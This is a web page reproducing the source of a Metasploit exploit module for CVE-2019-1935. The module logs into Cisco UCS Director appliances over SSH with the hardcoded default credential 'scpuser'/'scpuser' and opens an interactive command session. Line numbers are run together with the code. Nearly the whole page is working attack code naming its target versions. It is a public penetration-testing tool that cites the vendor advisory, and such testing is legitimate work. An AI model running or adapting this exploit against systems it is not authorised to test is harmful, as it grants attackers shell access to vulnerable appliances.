Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/linux/ssh/cisco_ucs_scpuser.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'net/ssh'6require 'net/ssh/command_stream'78class MetasploitModule < Msf::Exploit::Remote9Rank = ExcellentRanking1011include Msf::Exploit::Remote::SSH1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'Cisco UCS Director default scpuser password',18'Description' => %q{19This module abuses a known default password on Cisco UCS Director. The 'scpuser'20has the password of 'scpuser', and allows an attacker to login to the virtual appliance21via SSH.22This module has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.23Note that Cisco also mentions in their advisory that their IMC Supervisor and24UCS Director Express are also affected by these vulnerabilities, but this module25was not tested with those products.26},27'License' => MSF_LICENSE,28'Author' => [29'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module30],31'References' => [32[ 'CVE', '2019-1935' ],33[ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred' ],34[ 'URL', 'https://seclists.org/fulldisclosure/2019/Aug/36' ],35[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Cisco/cisco-ucs-rce.txt' ]36],37'DefaultOptions' => {38'EXITFUNC' => 'thread'39},40'Payload' => {41'Compat' => {42'PayloadType' => 'cmd_interact',43'ConnectionType' => 'find'44}45},46'Platform' => 'unix',47'Arch' => ARCH_CMD,48'Targets' => [49[ 'Cisco UCS Director < 6.7.2.0', {} ],50],51'Privileged' => false,52'DefaultTarget' => 0,53'DisclosureDate' => '2019-08-21',54'Notes' => {55'Stability' => [CRASH_SAFE],56'Reliability' => [REPEATABLE_SESSION],57'SideEffects' => []58}59)60)6162register_options(63[64Opt::RPORT(22),65OptString.new('USERNAME', [true, 'Username to login with', 'scpuser']),66OptString.new('PASSWORD', [true, 'Password to login with', 'scpuser']),67], self.class68)6970register_advanced_options(71[72OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),73OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])74]75)76end7778def rhost79datastore['RHOST']80end8182def rport83datastore['RPORT']84end8586def do_login(user, pass)87opts = ssh_client_defaults.merge({88auth_methods: ['password', 'keyboard-interactive'],89port: rport,90password: pass91})9293opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']9495begin96ssh = nil97::Timeout.timeout(datastore['SSH_TIMEOUT']) do98ssh = Net::SSH.start(rhost, user, opts)99end100rescue Rex::ConnectionError101return102rescue Net::SSH::Disconnect, ::EOFError103print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"104return105rescue ::Timeout::Error106print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"107return108rescue Net::SSH::AuthenticationFailed109print_error "#{rhost}:#{rport} SSH - Failed authentication"110rescue Net::SSH::Exception => e111print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"112return113end114115if ssh116conn = Net::SSH::CommandStream.new(ssh)117ssh = nil118return conn119end120121return nil122end123124def exploit125user = datastore['USERNAME']126pass = datastore['PASSWORD']127128print_status("#{rhost}:#{rport} - Attempt to login to the Cisco appliance...")129conn = do_login(user, pass)130if conn131print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")132handler(conn.lsock)133end134end135end136137138